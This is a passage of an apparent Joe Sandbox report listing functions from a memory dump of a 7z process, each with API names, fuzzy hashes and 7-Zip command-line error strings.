                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
                                                                                                                                                                                                                                                                            • Instruction ID: 305ca9876958be866345cba4a1ca1318c04a4d5ffa587dff9c0d767c36efeb18
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9771E12322C6C086CB60EB25E4506AEF76AF7CA750F645116EBDA47F59CF38C946CB04
                                                                                                                                                                                                                                                                            Function 0068BB68 Relevance: 10.1, APIs: 8, Instructions: 136COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-0
                                                                                                                                                                                                                                                                            • Opcode ID: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
                                                                                                                                                                                                                                                                            • Instruction ID: 57169d8531857ed89dc8c0b9228e38970877c3b1b7d620882f0937881c1b47d3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 194116322086C091CF35BF29D4102AD7B63DB96B98F186215EB9A07795DFB9D587C340
                                                                                                                                                                                                                                                                            Function 00680A58 Relevance: 10.1, APIs: 8, Instructions: 90COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: freememmove$ExceptionThrowmalloc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1818558235-0
                                                                                                                                                                                                                                                                            • Opcode ID: 765776f35c77edad6c13728d38dc7fcf5a9f6dac0127373448571f55f4189822
                                                                                                                                                                                                                                                                            • Instruction ID: beee0f9c1242d2e8bdf4abd2bd545c77b6981f7fdba916d591adfbecf1c4885f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 765776f35c77edad6c13728d38dc7fcf5a9f6dac0127373448571f55f4189822
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF3170B27116508BC7A4EF3AD49205DB3E6EB49FD8314452ADF1D97709DA30DC82CB84
                                                                                                                                                                                                                                                                            Function 00693162 Relevance: 10.0, APIs: 8, Instructions: 42COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                                                                                                                                                                                                                                                            • Instruction ID: 5ba616cf2b75911d7680279092920e34bb2b01fb1581f0298350199b7b74ba36
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF0F9B224ED9285CB54FF32C4B566EA762FBC7F81B042465EB4E73765CE28C406C608
                                                                                                                                                                                                                                                                            Function 006930A8 Relevance: 10.0, APIs: 8, Instructions: 41COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                                                                                                                                                                                                                            • Instruction ID: 11fab919cedf2fce9e1992fa2954803dca0641a0ff525a3ec59afca0bed56abb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7AF0F97224ED9241CB54FF32C4B562EA712FBC3F85F051055AB4E33751CE28C446C208
                                                                                                                                                                                                                                                                            Function 0069324C Relevance: 10.0, APIs: 8, Instructions: 41COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                                                                                                                                                                                                                            • Instruction ID: ef90a83bc1f554e3c9b8192e51d1cca93aedbc7708bd65d21e4da85dbd1c364d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FF0ECB224ED9241CB50FF32C8A562EA722F7C3F81F0510559B4E73751CE28C506C608
                                                                                                                                                                                                                                                                            Function 0069333D Relevance: 10.0, APIs: 8, Instructions: 40COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                                                                                                                                                                                                                            • Instruction ID: 3a6991af7dad7fd73a6d43c0e5155b9bf534dba6dc1f42415dfd4f7de51c9806
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75F030B224ED9281CB50FF32C4B566EA722FBC7F81F051055AB4E33751CE28C406C208
                                                                                                                                                                                                                                                                            Function 00692E29 Relevance: 10.0, APIs: 8, Instructions: 40COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                                                                                                                                                                                                                                                            • Instruction ID: 31f593c01571af0a12de3b234574ef92c5f39cc510370534c9dccdd8368ddee7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FF0BDB224ED9245CB54FF32C4B566EA712FBC7F81F051465AB4E73755CE28C406C608
                                                                                                                                                                                                                                                                            Function 00692EDB Relevance: 10.0, APIs: 8, Instructions: 38COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                                                                                                                                                                                                                                                            • Instruction ID: 1d4dba08ad2cc0080f4740a20d5d725a96ac4ba6c89c8def02504821d954e84a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89F0B7B228AD8285CB54FF32D47162EA322FBC7F81F012465AB4E73751CE28C406C60D
                                                                                                                                                                                                                                                                            Function 00692F97 Relevance: 10.0, APIs: 8, Instructions: 38COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
                                                                                                                                                                                                                                                                            • Instruction ID: 7138bd7234518bd7591ef7fb57a97c00800094d8e312dddff5b0b559cf45a811
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43F0DAB124AD8285CB54FF32D47162EA322FBC7F81F002465AB4E73B51CE28C406C60C
                                                                                                                                                                                                                                                                            Function 006AB310 Relevance: 10.0, APIs: 8, Instructions: 34COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$fputsmemset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 469995913-0
                                                                                                                                                                                                                                                                            • Opcode ID: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                                                                                                                                                                                                                                                            • Instruction ID: b4530cfdf23d3d1c061b9d61ffabf82f64665f0aab49ea57a86ee627ccf6f0b9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51F09772259D4281CB90FF31D8A252DA322E7C3B68B045265AF6D673EACE20C842C24C
                                                                                                                                                                                                                                                                            Function 00686484 Relevance: 9.2, APIs: 6, Instructions: 177COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmovewcscmp
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3584677832-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8f07c27319cfa5f95388e6e979af598d2aca2aeda731ef0214d5af31e1e2fbd3
                                                                                                                                                                                                                                                                            • Instruction ID: 48da302f84831b9ad7c637cd0c042f761cf6f5b46210562f96314bb3b61864f7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f07c27319cfa5f95388e6e979af598d2aca2aeda731ef0214d5af31e1e2fbd3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C51F673200A8486CF20FF16D4901AD7363F395B98B54822AFB5E0B768DF35C986C702
                                                                                                                                                                                                                                                                            Function 00661364 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 172COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-2104980125
                                                                                                                                                                                                                                                                            • Opcode ID: e608d69ddf76c65373c44b70f7ae3aeb3f136de1000bdcda8d63e8efa4483270
                                                                                                                                                                                                                                                                            • Instruction ID: fbb9b1c435be6b09668374cb5fc5461623a0782e9df074cda6b613f6fb7f65b0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e608d69ddf76c65373c44b70f7ae3aeb3f136de1000bdcda8d63e8efa4483270
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0951F2A2214AD1A6CF70EF24D4506ADB7A3F383398F889225D69B4B755EF35C986C700
                                                                                                                                                                                                                                                                            Function 00670358 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 143COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006704EE
                                                                                                                                                                                                                                                                              • Part of subcall function 0066FEC8: _CxxThrowException.MSVCRT ref: 0066FF2F
                                                                                                                                                                                                                                                                              • Part of subcall function 0066FEC8: free.MSVCRT ref: 0066FFAE
                                                                                                                                                                                                                                                                              • Part of subcall function 0066FEC8: _CxxThrowException.MSVCRT ref: 0066FFD1
                                                                                                                                                                                                                                                                              • Part of subcall function 0066FEC8: _CxxThrowException.MSVCRT ref: 0066FFF7
                                                                                                                                                                                                                                                                              • Part of subcall function 0066FEC8: _CxxThrowException.MSVCRT ref: 0067002B
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00670523
                                                                                                                                                                                                                                                                            • _CxxThrowException.MSVCRT ref: 00670564
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionThrow$free
                                                                                                                                                                                                                                                                            • String ID: Incorrect wildcard type marker$Too short switch
                                                                                                                                                                                                                                                                            • API String ID: 3129652135-1817034180
                                                                                                                                                                                                                                                                            • Opcode ID: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                                                                                                                                                                                                                                                            • Instruction ID: b4da07fa581ae90703b3ff8916e586163bac0b7661884b6a6f6aa0ddfd9c0f9d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA51AE622086D4C5EB20DF25E4507AEBB62F385B98F54C116EF8D17B59DB38C586CB20
                                                                                                                                                                                                                                                                            Function 0069E2F0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID: #
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-1885708031
                                                                                                                                                                                                                                                                            • Opcode ID: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                                                                                                                                                                                                                                                            • Instruction ID: c593cfa26cb664b1fd1df8d5a0da107e35702a48d96c78dad624e2e560b267f0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91518326314B8482CF60DB25D49039EB766F7C9B90F584215EB9E47BA5DF3DC849C704
                                                                                                                                                                                                                                                                            Function 006A2688 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 126stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
